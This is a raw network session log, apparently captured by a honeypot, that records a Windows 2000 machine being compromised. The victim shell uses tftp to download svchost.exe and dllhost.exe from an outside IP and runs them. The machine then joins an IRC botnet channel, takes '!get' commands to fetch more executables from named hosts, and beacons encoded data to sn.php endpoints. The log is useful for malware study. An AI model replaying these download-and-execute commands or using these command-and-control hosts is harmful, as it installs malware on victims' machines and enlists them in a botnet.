VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp.
    C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label.
    Volume Serial Number is F07B-A028
    Directory of C:\\WINNT\\system32\\wins
    File Not Found
    C:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label.
    Volume Serial Number is F07B-A028
    Directory of C:\\WINNT\\system32\\dllcache
    File Not Found
    C:\\WINNT\\system32>
VICTIM: tftp -i 175.112.215.240 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001 VICTIM: \000\004\000\002 VICTIM: \000\004\000\003 VICTIM: \000\004\000\004 VICTIM: \000\004\000\005 VICTIM: \000\004\000\006 VICTIM: \000\004\000\007 VICTIM: \000\004\000\010 VICTIM: \000\004\000\t VICTIM: \000\004\000 VICTIM: \000\004\000\013 VICTIM: \000\004\000\014 VICTIM: \000\004\000 VICTIM: \000\004\000\016 VICTIM: \000\004\000\017 VICTIM: \000\004\000\020 VICTIM: \000\004\000\021 VICTIM: \000\004\000\022 VICTIM: \000\004\000\023 VICTIM: \000\004\000\024 VICTIM: \000\004\000\025 VICTIM: \000\004\000\026 VICTIM: \000\004\000\027 VICTIM: \000\004\000\030 VICTIM: \000\004\000\031 VICTIM: \000\004\000\032 VICTIM: \000\004\000\033 VICTIM: \000\004\000\034 VICTIM: \000\004\000\035 VICTIM: \000\004\000\036 VICTIM: \000\004\000\037 VICTIM: \000\004\000 VICTIM: \000\004\000! VICTIM: \000\004\000\ VICTIM: \000\004\000# VICTIM: \000\004\000\$ VICTIM: \000\004\000% VICTIM: \000\004\000& VICTIM: \000\004\000' VICTIM: \000\004\000( VICTIM: \000\004\000) VICTIM: \000\004\000* VICTIM: \000\004\000+ VICTIM: \000\004\000, VICTIM: \000\004\000- VICTIM: \000\004\000. VICTIM: \000\004\000/ VICTIM: \000\004\0000 VICTIM: \000\004\0001 VICTIM: \000\004\0002 VICTIM: \000\004\0003 VICTIM: \000\004\0004 VICTIM: \000\004\0005 VICTIM: \000\004\0006 VICTIM: \000\004\0007 VICTIM: \000\004\0008 VICTIM: \000\004\0009 VICTIM: \000\004\000:
VICTIM: Transfer successful: 29184 bytes in 13 seconds, 2244 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: tftp -i 175.112.215.240 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\001 VICTIM: \000\004\000\002 VICTIM: \000\004\000\003 VICTIM: \000\004\000\004 VICTIM: \000\004\000\005 VICTIM: \000\004\000\006 VICTIM: \000\004\000\007 VICTIM: \000\004\000\010 VICTIM: \000\004\000\t VICTIM: \000\004\000 VICTIM: \000\004\000\013 VICTIM: \000\004\000\014 VICTIM: \000\004\000 VICTIM: \000\004\000\016 VICTIM: \000\004\000\017 VICTIM: \000\004\000\020 VICTIM: \000\004\000\021 VICTIM: \000\004\000\022 VICTIM: \000\004\000\023 VICTIM: \000\004\000\024 VICTIM: \000\004\000\025 VICTIM: \000\004\000\026 VICTIM: \000\004\000\027 VICTIM: \000\004\000\030 VICTIM: \000\004\000\031 VICTIM: \000\004\000\032 VICTIM: \000\004\000\033 VICTIM: \000\004\000\034 VICTIM: \000\004\000\035 VICTIM: \000\004\000\036 VICTIM: \000\004\000\037 VICTIM: \000\004\000 VICTIM: \000\004\000! VICTIM: \000\004\000\ VICTIM: \000\004\000# VICTIM: \000\004\000\$ VICTIM: \000\004\000% VICTIM: \000\004\000& VICTIM: \000\004\000' VICTIM: \000\004\000(
VICTIM: Transfer successful: 19968 bytes in 10 seconds, 1996 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK vailqkvj
    USER g020500 . . :-
VICTIM: Service Pack 2
    JOIN &virtu
ATTACKER: :u. PRIVMSG vailqkvj :!get http:/210.83.81.173:88/nmb.exe
    :u. PRIVMSG vailqkvj :!get http:/tyui89.com/08d.txt
    :u. PRIVMSG vailqkvj :!get http:/tyui89.com/temp/fast.exe
VICTIM: GET /nmb.exe HTTP/1.0
    User-Agent: Download
    Host: 210.83.81.173:88
    Pragma: no-cache
ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869CEDCE5CA9D5FE6F6CADFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5C74322&v=2&t=0.2856867 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: 210.83.81.173:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /a8.txt?t=0.9882013 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: 122.224.18.20:88
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /a8.txt?t=0.9882013 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: 122.224.18.20:88
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=6B75C92D36A68A2B2CC01739D19662DCE07E84EC32168910D1B4BCFDA27B2E75443F869F1F756A5EB78AF698B9A81B0266A8E45C3C53EFBA14769C390F74BFCE0754D7715C891F80556FEB91719F33EC5EA93E036719C3C59A38006D01F8921695CD1A3AD6FBEC5C378461E6B3B37FE549BE103F3B7C6B4C356C751AD0669C220D09EA43B79858E7CFFA075076B41468&t=0.9961969 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: 210.83.81.173:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=A8B6AC48AA3AFC5DD438D6F865226AD4F6686E06DFFB70E9C2A7A9E88E5782D9730828319EF4E7D3BC811D738A9B051C02CCB008EA85DF8AC8AAA1048BF0DCAD6B382E88C510CA550F35374D09E722FDD92EA09DBAC48E885EFCF79A3EC7A82C5C045777547905B5A81B8C1AA85172FA689D7729A4F77D4F8296B4C18A2838C254447BD3C0F039FCA695C4926AA9E561DD03&t=0.820965 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: 210.83.81.173:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /mstrz.jpg?t=8.726138E-02 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: 58.150.174.222
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=1F0102E694041BBB01EE4B61296E50A4CA03FCC9391FF268A99F511BA572B29D99E22A3D573D2515F1CD57CD756721CC37FD12A8DA446A3A3606CDB4C6BF8EFD502C2F8BD40C0D92152F59232DC3BD6213E46D50FC826D6BF052513C21D8C94DB7EFB0902A077DCD70C342C57F7F9E04F3044E61DC9B4562FDA46D0205B37DC384829039B5805F99487C4414D7117BFA&t=9.977359E-02 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: 210.83.81.173:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=A7B94EAAB020B919876812387E3942B6539AB683BE9841DB596FE0AACC1BB49B6A11AEB99FF5C3F3DEE2A73DF1E354B9D913F248A03EDA8ACDFDC5BC552C6D1E403C218563BB20BFD0EABDC7F21C8F5074833F025C22B7B104A6B2DFD72E0B8FFCA435155578C3737CCFF066A85178F094614D13EAB9EEDCBFAB64111CBE30CAADBDB6110D39E32146721F467DBCD4A8EB37&t=0.114422 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: 210.83.81.173:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: PING :j.
ATTACKER: PONG :j.
VICTIM: JOIN &virtu
ATTACKER: PING :j.
ATTACKER: PONG :j.
VICTIM: JOIN &virtu
ATTACKER: PING :j.
ATTACKER: PONG :j.
VICTIM: JOIN &virtu
ATTACKER: PING :j.
ATTACKER: PONG :j.
VICTIM: JOIN &virtu
ATTACKER: PING :j.
ATTACKER: PONG :j.
VICTIM: JOIN &virtu
ATTACKER: PONG :j.
VICTIM: JOIN &virtu
ATTACKER: PONG :j.
VICTIM: JOIN &virtu
ATTACKER: PONG :j.
VICTIM: JOIN &virtu